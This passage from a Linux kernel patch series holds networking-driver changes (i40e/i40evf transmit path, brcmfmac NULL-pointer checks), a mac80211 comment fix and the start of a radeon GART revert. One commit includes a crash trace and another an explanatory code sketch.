no sideband TCP/IPv4 rules\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR re-enabled due to no sideband TCP/IPv4 rules\n"); } } @@ -501,7 +503,8 @@ static void i40e_fd_handle_status(struct i40e_ring *rx_ring, if ((pf->flags & I40E_FLAG_FD_SB_ENABLED) && !(pf->auto_disable_flags & I40E_FLAG_FD_SB_ENABLED)) { - dev_warn(&pdev->dev, "FD filter space full, new ntuple rules will not be added\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_warn(&pdev->dev, "FD filter space full, new ntuple rules will not be added\n"); pf->auto_disable_flags |= I40E_FLAG_FD_SB_ENABLED; } From 8f6a2b05c67d915cef66b2c9636404e0d531def2 Mon Sep 17 00:00:00 2001 From: Jesse Brandeburg Date: Thu, 16 Apr 2015 20:06:09 -0400 Subject: [PATCH 404/872] i40evf: skb->xmit_more support Eric added support for skb->xmit_more in i40e; this ports that support into i40evf as well. Supporting skb->xmit_more in i40evf is straightforward: we need to move the i40e_maybe_stop_tx() call so that netif_xmit_stopped() is tested correctly before deciding not to kick the NIC.
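For reference, the doorbell-batching pattern being ported looks roughly like the sketch below. This is illustrative only and simplified from the real driver code: the helper name example_kick_hw() is made up, while i40evf_maybe_stop_tx() and DESC_NEEDED come from the patch itself.

static void example_kick_hw(struct i40e_ring *tx_ring, struct sk_buff *skb,
			    u32 next_to_use)
{
	/* stop the queue now if the ring is nearly full */
	i40evf_maybe_stop_tx(tx_ring, DESC_NEEDED);

	/* Only write the tail (doorbell) register when the stack has no
	 * further packets queued, or when the queue was just stopped;
	 * otherwise the pending descriptors are flushed by a later kick.
	 */
	if (!skb->xmit_more ||
	    netif_xmit_stopped(netdev_get_tx_queue(tx_ring->netdev,
						   tx_ring->queue_index)))
		writel(next_to_use, tx_ring->tail);
}

The netif_xmit_stopped() test is what keeps the optimization safe: if the queue was just stopped there may be no later transmit to perform the deferred doorbell write, so the hardware must be kicked immediately.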
Change-ID: Idddda6a2e4a7ab335631c91ced51f55b25eb8468 Signed-off-by: Eric Dumazet Signed-off-by: Daniel Borkmann Signed-off-by: Jesse Brandeburg Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 88 ++++++++++--------- 1 file changed, 47 insertions(+), 41 deletions(-) diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 1c79a0801d94..64506631022d 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1669,6 +1669,47 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, return linearize; } +/** + * __i40evf_maybe_stop_tx - 2nd level check for tx stop conditions + * @tx_ring: the ring to be checked + * @size: the size buffer we want to assure is available + * + * Returns -EBUSY if a stop is needed, else 0 + **/ +static inline int __i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +{ + netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); + /* Memory barrier before checking head and tail */ + smp_mb(); + + /* Check again in a case another CPU has just made room available. */ + if (likely(I40E_DESC_UNUSED(tx_ring) < size)) + return -EBUSY; + + /* A reprieve! - use start_queue because it doesn't call schedule */ + netif_start_subqueue(tx_ring->netdev, tx_ring->queue_index); + ++tx_ring->tx_stats.restart_queue; + return 0; +} + +/** + * i40evf_maybe_stop_tx - 1st level check for tx stop conditions + * @tx_ring: the ring to be checked + * @size: the size buffer we want to assure is available + * + * Returns 0 if stop is not needed + **/ +#ifdef I40E_FCOE +int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +#else +static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +#endif +{ + if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) + return 0; + return __i40evf_maybe_stop_tx(tx_ring, size); +} + /** * i40e_tx_map - Build the Tx descriptor * @tx_ring: ring to send buffer on @@ -1806,8 +1847,12 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->next_to_use = i; + i40evf_maybe_stop_tx(tx_ring, DESC_NEEDED); /* notify HW of packet */ - writel(i, tx_ring->tail); + if (!skb->xmit_more || + netif_xmit_stopped(netdev_get_tx_queue(tx_ring->netdev, + tx_ring->queue_index))) + writel(i, tx_ring->tail); return; @@ -1828,43 +1873,6 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->next_to_use = i; } -/** - * __i40e_maybe_stop_tx - 2nd level check for tx stop conditions - * @tx_ring: the ring to be checked - * @size: the size buffer we want to assure is available - * - * Returns -EBUSY if a stop is needed, else 0 - **/ -static inline int __i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -{ - netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); - /* Memory barrier before checking head and tail */ - smp_mb(); - - /* Check again in a case another CPU has just made room available. */ - if (likely(I40E_DESC_UNUSED(tx_ring) < size)) - return -EBUSY; - - /* A reprieve! 
- use start_queue because it doesn't call schedule */ - netif_start_subqueue(tx_ring->netdev, tx_ring->queue_index); - ++tx_ring->tx_stats.restart_queue; - return 0; -} - -/** - * i40e_maybe_stop_tx - 1st level check for tx stop conditions - * @tx_ring: the ring to be checked - * @size: the size buffer we want to assure is available - * - * Returns 0 if stop is not needed - **/ -static int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -{ - if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) - return 0; - return __i40e_maybe_stop_tx(tx_ring, size); -} - /** * i40e_xmit_descriptor_count - calculate number of tx descriptors needed * @skb: send buffer @@ -1890,7 +1898,7 @@ static int i40e_xmit_descriptor_count(struct sk_buff *skb, count += TXD_USE_COUNT(skb_shinfo(skb)->frags[f].size); count += TXD_USE_COUNT(skb_headlen(skb)); - if (i40e_maybe_stop_tx(tx_ring, count + 4 + 1)) { + if (i40evf_maybe_stop_tx(tx_ring, count + 4 + 1)) { tx_ring->tx_stats.tx_busy++; return 0; } @@ -1966,8 +1974,6 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, i40e_tx_map(tx_ring, skb, first, tx_flags, hdr_len, td_cmd, td_offset); - i40e_maybe_stop_tx(tx_ring, DESC_NEEDED); - return NETDEV_TX_OK; out_drop: From 3e587cf3c1cc2996c39f8a19e453cb8233112416 Mon Sep 17 00:00:00 2001 From: Jesse Brandeburg Date: Thu, 16 Apr 2015 20:06:10 -0400 Subject: [PATCH 405/872] i40e/i40evf: force inline transmit functions Inlining these functions gives us about 15% more 64 byte packets per second when using pktgen. 13.3 million to 15 million with a single queue. Also fix the function names in i40evf to i40evf not i40e while we are touching the function header. Change-ID: I3294ae9b085cf438672b6db5f9af122490ead9d0 Signed-off-by: Jesse Brandeburg Signed-off-by: Catherine Sullivan Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 32 ++++++++--------- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 36 +++++++++---------- 2 files changed, 32 insertions(+), 36 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 3414e468bb51..5fa43f7f1ebb 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -2063,13 +2063,13 @@ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, * otherwise returns 0 to indicate the flags has been set properly. 
**/ #ifdef I40E_FCOE -int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, - struct i40e_ring *tx_ring, - u32 *flags) -#else -static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, +inline int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, struct i40e_ring *tx_ring, u32 *flags) +#else +static inline int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, + struct i40e_ring *tx_ring, + u32 *flags) #endif { __be16 protocol = skb->protocol; @@ -2412,9 +2412,9 @@ static inline int __i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * Returns 0 if stop is not needed **/ #ifdef I40E_FCOE -int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +inline int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) #else -static int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +static inline int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) #endif { if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) @@ -2494,13 +2494,13 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, * @td_offset: offset for checksum or crc **/ #ifdef I40E_FCOE -void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, - struct i40e_tx_buffer *first, u32 tx_flags, - const u8 hdr_len, u32 td_cmd, u32 td_offset) -#else -static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, +inline void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, struct i40e_tx_buffer *first, u32 tx_flags, const u8 hdr_len, u32 td_cmd, u32 td_offset) +#else +static inline void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, + struct i40e_tx_buffer *first, u32 tx_flags, + const u8 hdr_len, u32 td_cmd, u32 td_offset) #endif { unsigned int data_len = skb->data_len; @@ -2661,11 +2661,11 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, * one descriptor. **/ #ifdef I40E_FCOE -int i40e_xmit_descriptor_count(struct sk_buff *skb, - struct i40e_ring *tx_ring) -#else -static int i40e_xmit_descriptor_count(struct sk_buff *skb, +inline int i40e_xmit_descriptor_count(struct sk_buff *skb, struct i40e_ring *tx_ring) +#else +static inline int i40e_xmit_descriptor_count(struct sk_buff *skb, + struct i40e_ring *tx_ring) #endif { unsigned int f; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 64506631022d..0ac134b340ce 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1347,7 +1347,7 @@ int i40evf_napi_poll(struct napi_struct *napi, int budget) } /** - * i40e_tx_prepare_vlan_flags - prepare generic TX VLAN tagging flags for HW + * i40evf_tx_prepare_vlan_flags - prepare generic TX VLAN tagging flags for HW * @skb: send buffer * @tx_ring: ring to send buffer on * @flags: the tx flags to be set @@ -1358,9 +1358,9 @@ int i40evf_napi_poll(struct napi_struct *napi, int budget) * Returns error code indicate the frame should be dropped upon error and the * otherwise returns 0 to indicate the flags has been set properly. 
**/ -static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, - struct i40e_ring *tx_ring, - u32 *flags) +static inline int i40evf_tx_prepare_vlan_flags(struct sk_buff *skb, + struct i40e_ring *tx_ring, + u32 *flags) { __be16 protocol = skb->protocol; u32 tx_flags = 0; @@ -1699,11 +1699,7 @@ static inline int __i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * * Returns 0 if stop is not needed **/ -#ifdef I40E_FCOE -int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -#else -static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -#endif +static inline int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) { if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) return 0; @@ -1711,7 +1707,7 @@ static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) } /** - * i40e_tx_map - Build the Tx descriptor + * i40evf_tx_map - Build the Tx descriptor * @tx_ring: ring to send buffer on * @skb: send buffer * @first: first buffer info buffer to use @@ -1720,9 +1716,9 @@ static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * @td_cmd: the command field in the descriptor * @td_offset: offset for checksum or crc **/ -static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, - struct i40e_tx_buffer *first, u32 tx_flags, - const u8 hdr_len, u32 td_cmd, u32 td_offset) +static inline void i40evf_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, + struct i40e_tx_buffer *first, u32 tx_flags, + const u8 hdr_len, u32 td_cmd, u32 td_offset) { unsigned int data_len = skb->data_len; unsigned int size = skb_headlen(skb); @@ -1874,7 +1870,7 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, } /** - * i40e_xmit_descriptor_count - calculate number of tx descriptors needed + * i40evf_xmit_descriptor_count - calculate number of tx descriptors needed * @skb: send buffer * @tx_ring: ring to send buffer on * @@ -1882,8 +1878,8 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, * there is not enough descriptors available in this ring since we need at least * one descriptor. **/ -static int i40e_xmit_descriptor_count(struct sk_buff *skb, - struct i40e_ring *tx_ring) +static inline int i40evf_xmit_descriptor_count(struct sk_buff *skb, + struct i40e_ring *tx_ring) { unsigned int f; int count = 0; @@ -1924,11 +1920,11 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, u32 td_cmd = 0; u8 hdr_len = 0; int tso; - if (0 == i40e_xmit_descriptor_count(skb, tx_ring)) + if (0 == i40evf_xmit_descriptor_count(skb, tx_ring)) return NETDEV_TX_BUSY; /* prepare the xmit flags */ - if (i40e_tx_prepare_vlan_flags(skb, tx_ring, &tx_flags)) + if (i40evf_tx_prepare_vlan_flags(skb, tx_ring, &tx_flags)) goto out_drop; /* obtain protocol of skb */ @@ -1971,8 +1967,8 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, i40e_create_tx_ctx(tx_ring, cd_type_cmd_tso_mss, cd_tunneling, cd_l2tag2); - i40e_tx_map(tx_ring, skb, first, tx_flags, hdr_len, - td_cmd, td_offset); + i40evf_tx_map(tx_ring, skb, first, tx_flags, hdr_len, + td_cmd, td_offset); return NETDEV_TX_OK; From 335075989fbb3c3fffc3ba238b893fa92508a6f1 Mon Sep 17 00:00:00 2001 From: Jesse Brandeburg Date: Thu, 16 Apr 2015 20:06:11 -0400 Subject: [PATCH 406/872] i40e/i40evf: remove time_stamp member The driver doesn't use the time_stamp member to determine if there is a tx_hang any more. There really isn't any point to the variable at all so just remove it. It was left over from a previous tx_hang design. 
Change-ID: I4c814827e1bcb46e45118fe37acdcfa814fb62a0 Signed-off-by: Jesse Brandeburg Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 10 ---------- drivers/net/ethernet/intel/i40e/i40e_txrx.h | 1 - drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 7 ------- drivers/net/ethernet/intel/i40evf/i40e_txrx.h | 1 - 4 files changed, 19 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 5fa43f7f1ebb..cc82a7ffacb0 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -165,9 +165,6 @@ int i40e_program_fdir_filter(struct i40e_fdir_filter *fdir_data, u8 *raw_packet, tx_desc->cmd_type_offset_bsz = build_ctob(td_cmd, 0, I40E_FDIR_MAX_RAW_PACKET_SIZE, 0); - /* set the timestamp */ - tx_buf->time_stamp = jiffies; - /* Force memory writes to complete before letting h/w * know there are new descriptors to fetch. */ @@ -810,10 +807,6 @@ static bool i40e_clean_tx_irq(struct i40e_ring *tx_ring, int budget) tx_ring->vsi->seid, tx_ring->queue_index, tx_ring->next_to_use, i); - dev_info(tx_ring->dev, "tx_bi[next_to_clean]\n" - " time_stamp <%lx>\n" - " jiffies <%lx>\n", - tx_ring->tx_bi[i].time_stamp, jiffies); netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); @@ -2606,9 +2599,6 @@ static inline void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->queue_index), first->bytecount); - /* set the timestamp */ - first->time_stamp = jiffies; - /* Force memory writes to complete before letting h/w * know there are new descriptors to fetch. (Only * applicable for weak-ordered memory model archs, diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.h b/drivers/net/ethernet/intel/i40e/i40e_txrx.h index ea1df3b48747..0dc48dc9ca61 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.h @@ -147,7 +147,6 @@ enum i40e_dyn_idx_t { struct i40e_tx_buffer { struct i40e_tx_desc *next_to_watch; - unsigned long time_stamp; union { struct sk_buff *skb; void *raw_buf; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 0ac134b340ce..ec7e220757db 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -322,10 +322,6 @@ static bool i40e_clean_tx_irq(struct i40e_ring *tx_ring, int budget) tx_ring->vsi->seid, tx_ring->queue_index, tx_ring->next_to_use, i); - dev_info(tx_ring->dev, "tx_bi[next_to_clean]\n" - " time_stamp <%lx>\n" - " jiffies <%lx>\n", - tx_ring->tx_bi[i].time_stamp, jiffies); netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); @@ -1824,9 +1820,6 @@ static inline void i40evf_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->queue_index), first->bytecount); - /* set the timestamp */ - first->time_stamp = jiffies; - /* Force memory writes to complete before letting h/w * know there are new descriptors to fetch. 
(Only * applicable for weak-ordered memory model archs, diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h index a23f5e862f06..e7a34f899f2c 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h @@ -146,7 +146,6 @@ enum i40e_dyn_idx_t { struct i40e_tx_buffer { struct i40e_tx_desc *next_to_watch; - unsigned long time_stamp; union { struct sk_buff *skb; void *raw_buf; From f029094e49814b56fdb3261a694c8890983b7a2d Mon Sep 17 00:00:00 2001 From: Catherine Sullivan Date: Thu, 16 Apr 2015 20:06:12 -0400 Subject: [PATCH 407/872] i40e: Bump version to 1.3.4 Bump. Change-ID: I54ec2787a9fead5e18447078f26e5dd27f01da44 Signed-off-by: Catherine Sullivan Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index d6113e3d76f2..0a3e928a2b00 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -39,7 +39,7 @@ static const char i40e_driver_string[] = #define DRV_VERSION_MAJOR 1 #define DRV_VERSION_MINOR 3 -#define DRV_VERSION_BUILD 2 +#define DRV_VERSION_BUILD 4 #define DRV_VERSION __stringify(DRV_VERSION_MAJOR) "." \ __stringify(DRV_VERSION_MINOR) "." \ __stringify(DRV_VERSION_BUILD) DRV_KERN From 3a7af58faa7829faa26026c245d2a8a44e9605c5 Mon Sep 17 00:00:00 2001 From: Jonathan Corbet Date: Mon, 13 Apr 2015 18:27:35 +0200 Subject: [PATCH 408/872] mac80211: Fix mac80211.h docbook comments A couple of enums in mac80211.h became structures recently, but the comments didn't follow suit, leading to errors like: Error(.//include/net/mac80211.h:367): Cannot parse enum! Documentation/DocBook/Makefile:93: recipe for target 'Documentation/DocBook/80211.xml' failed make[1]: *** [Documentation/DocBook/80211.xml] Error 1 Makefile:1361: recipe for target 'mandocs' failed make: *** [mandocs] Error 2 Fix the comments accordingly. Added a couple of other small comment fixes while I was there to silence other recently-added docbook warnings. Reported-by: Jim Davis Signed-off-by: Jonathan Corbet Signed-off-by: Johannes Berg --- include/net/mac80211.h | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/include/net/mac80211.h b/include/net/mac80211.h index 8e3668b44c29..fc57f6b82fc5 100644 --- a/include/net/mac80211.h +++ b/include/net/mac80211.h @@ -354,7 +354,7 @@ enum ieee80211_rssi_event_data { }; /** - * enum ieee80211_rssi_event - data attached to an %RSSI_EVENT + * struct ieee80211_rssi_event - data attached to an %RSSI_EVENT * @data: See &enum ieee80211_rssi_event_data */ struct ieee80211_rssi_event { @@ -388,7 +388,7 @@ enum ieee80211_mlme_event_status { }; /** - * enum ieee80211_mlme_event - data attached to an %MLME_EVENT + * struct ieee80211_mlme_event - data attached to an %MLME_EVENT * @data: See &enum ieee80211_mlme_event_data * @status: See &enum ieee80211_mlme_event_status * @reason: the reason code if applicable @@ -401,9 +401,10 @@ struct ieee80211_mlme_event { /** * struct ieee80211_event - event to be sent to the driver - * @type The event itself. See &enum ieee80211_event_type. + * @type: The event itself. See &enum ieee80211_event_type.
* @rssi: relevant if &type is %RSSI_EVENT * @mlme: relevant if &type is %AUTH_EVENT + * @u: union holding the above two fields */ struct ieee80211_event { enum ieee80211_event_type type; From 7d072b404c5d8f1e0b62b6bc488dfeaa61bd2d8d Mon Sep 17 00:00:00 2001 From: Arend van Spriel Date: Tue, 26 May 2015 13:19:46 +0200 Subject: [PATCH 409/872] brcmfmac: avoid null pointer access when brcmf_msgbuf_get_pktid() fails The function brcmf_msgbuf_get_pktid() may return a NULL pointer so the callers should check the return pointer before accessing it to avoid the crash below (see [1]): brcmfmac: brcmf_msgbuf_get_pktid: Invalid packet id 273 (not in use) BUG: unable to handle kernel NULL pointer dereference at 0000000000000080 IP: [] skb_pull+0x5/0x50 PGD 0 Oops: 0000 [#1] PREEMPT SMP Modules linked in: pci_stub vboxpci(O) vboxnetflt(O) vboxnetadp(O) vboxdrv(O) snd_hda_codec_hdmi bnep mousedev hid_generic ushwmon msr ext4 crc16 mbcache jbd2 sd_mod uas usb_storage ahci libahci libata scsi_mod xhci_pci xhci_hcd usbcore usb_common CPU: 0 PID: 1661 Comm: irq/61-brcmf_pc Tainted: G O 4.0.1-MacbookPro-ARCH #1 Hardware name: Apple Inc. MacBookPro12,1/Mac-E43C1C25D4880AD6, BIOS MBP121.88Z.0167.B02.1503241251 03/24/2015 task: ffff880264203cc0 ti: ffff88025ffe4000 task.ti: ffff88025ffe4000 RIP: 0010:[] [] skb_pull+0x5/0x50 RSP: 0018:ffff88025ffe7d40 EFLAGS: 00010202 RAX: 0000000000000000 RBX: ffff88008a33c000 RCX: 0000000000000044 RDX: 0000000000000000 RSI: 000000000000004a RDI: 0000000000000000 RBP: ffff88025ffe7da8 R08: 0000000000000096 R09: 000000000000004a R10: 0000000000000000 R11: 000000000000048e R12: ffff88025ff14f00 R13: 0000000000000000 R14: ffff880263b48200 R15: ffff88008a33c000 FS: 0000000000000000(0000) GS:ffff88026ec00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000080 CR3: 000000000180b000 CR4: 00000000003407f0 Stack: ffffffffa06aed74 ffff88025ffe7dc8 ffff880263b48270 ffff880263b48278 05ea88020000004a 0002ffff81014635 000000001720b2f6 ffff88026ec116c0 ffff880263b48200 0000000000010000 ffff880263b4ae00 ffff880264203cc0 Call Trace: [] ? brcmf_msgbuf_process_rx+0x404/0x480 [brcmfmac] [] ? irq_finalize_oneshot.part.30+0xf0/0xf0 [] brcmf_proto_msgbuf_rx_trigger+0x35/0xf0 [brcmfmac] [] brcmf_pcie_isr_thread_v2+0x8a/0x130 [brcmfmac] [] irq_thread_fn+0x20/0x50 [] irq_thread+0x13f/0x170 [] ? wake_threads_waitq+0x30/0x30 [] ? irq_thread_dtor+0xb0/0xb0 [] kthread+0xd8/0xf0 [] ? kthread_create_on_node+0x1c0/0x1c0 [] ret_from_fork+0x58/0x90 [] ? 
kthread_create_on_node+0x1c0/0x1c0 Code: 01 83 e2 f7 88 50 01 48 83 c4 08 5b 5d f3 c3 0f 1f 80 00 00 00 00 83 e2 f7 88 50 01 c3 66 0f 1f 84 00 00 00 00 00 0f 1f RIP [] skb_pull+0x5/0x50 RSP CR2: 0000000000000080 ---[ end trace b074c0f90e7c997d ]--- [1] http://mid.gmane.org/20150430193259.GA5630@googlemail.com Cc: # v3.18, v3.19, v4.0, v4.1 Reported-by: Michael Hornung Reviewed-by: Hante Meuleman Reviewed-by: Pieter-Paul Giesberts Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c index 4ec9811f49c8..65efb1468988 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c @@ -511,11 +511,9 @@ static int brcmf_msgbuf_query_dcmd(struct brcmf_pub *drvr, int ifidx, msgbuf->rx_pktids, msgbuf->ioctl_resp_pktid); if (msgbuf->ioctl_resp_ret_len != 0) { - if (!skb) { - brcmf_err("Invalid packet id idx recv'd %d\n", - msgbuf->ioctl_resp_pktid); + if (!skb) return -EBADF; - } + memcpy(buf, skb->data, (len < msgbuf->ioctl_resp_ret_len) ? len : msgbuf->ioctl_resp_ret_len); } @@ -874,10 +872,8 @@ brcmf_msgbuf_process_txstatus(struct brcmf_msgbuf *msgbuf, void *buf) flowid -= BRCMF_NROF_H2D_COMMON_MSGRINGS; skb = brcmf_msgbuf_get_pktid(msgbuf->drvr->bus_if->dev, msgbuf->tx_pktids, idx); - if (!skb) { - brcmf_err("Invalid packet id idx recv'd %d\n", idx); + if (!skb) return; - } set_bit(flowid, msgbuf->txstatus_done_map); commonring = msgbuf->flowrings[flowid]; @@ -1156,6 +1152,8 @@ brcmf_msgbuf_process_rx_complete(struct brcmf_msgbuf *msgbuf, void *buf) skb = brcmf_msgbuf_get_pktid(msgbuf->drvr->bus_if->dev, msgbuf->rx_pktids, idx); + if (!skb) + return; if (data_offset) skb_pull(skb, data_offset); From 7c0411d2fabc2e2702c9871ffb603e251158b317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Christian=20K=C3=B6nig?= Date: Thu, 28 May 2015 15:51:59 +0200 Subject: [PATCH 410/872] drm/radeon: partially revert "fix VM_CONTEXT*_PAGE_TABLE_END_ADDR handling" MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit We have that bug for years and some users report side effects when fixing it on older hardware. So revert it for VM_CONTEXT0_PAGE_TABLE_END_ADDR, but keep it for VM 1-15. 
Signed-off-by: Christian König CC: stable@vger.kernel.org Signed-off-by: Alex Deucher --- drivers/gpu/drm/radeon/cik.c | 2 +- drivers/gpu/drm/radeon/evergreen.c | 2 +- drivers/gpu/drm/radeon/ni.c | 2 +- drivers/gpu/drm/radeon/r600.c | 2 +- drivers/gpu/drm/radeon/rv770.c | 2 +- drivers/gpu/drm/radeon/si.c | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/gpu/drm/radeon/cik.c b/drivers/gpu/drm/radeon/cik.c index a0c35bbc8546..ba50f3c1c2e0 100644 --- a/drivers/gpu/drm/radeon/cik.c +++ b/drivers/gpu/drm/radeon/cik.c @@ -5822,7 +5822,7 @@ static int cik_pcie_gart_enable(struct radeon_device *rdev) L2_CACHE_BIGK_FRAGMENT_SIZE(4)); /* setup context0 */ WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_PROTECTION_FAULT_DEFAULT_ADDR, (u32)(rdev->dummy_page.addr >> 12)); diff --git a/drivers/gpu/drm/radeon/evergreen.c b/drivers/gpu/drm/radeon/evergreen.c index 05e6d6ef5963..f848acfd3fc8 100644 --- a/drivers/gpu/drm/radeon/evergreen.c +++ b/drivers/gpu/drm/radeon/evergreen.c @@ -2485,7 +2485,7 @@ static int evergreen_pcie_gart_enable(struct radeon_device *rdev) WREG32(MC_VM_MB_L1_TLB2_CNTL, tmp); WREG32(MC_VM_MB_L1_TLB3_CNTL, tmp); WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_CNTL, ENABLE_CONTEXT | PAGE_TABLE_DEPTH(0) | RANGE_PROTECTION_FAULT_ENABLE_DEFAULT); diff --git a/drivers/gpu/drm/radeon/ni.c b/drivers/gpu/drm/radeon/ni.c index aba2f428c0a8..64d3a771920d 100644 --- a/drivers/gpu/drm/radeon/ni.c +++ b/drivers/gpu/drm/radeon/ni.c @@ -1282,7 +1282,7 @@ static int cayman_pcie_gart_enable(struct radeon_device *rdev) L2_CACHE_BIGK_FRAGMENT_SIZE(6)); 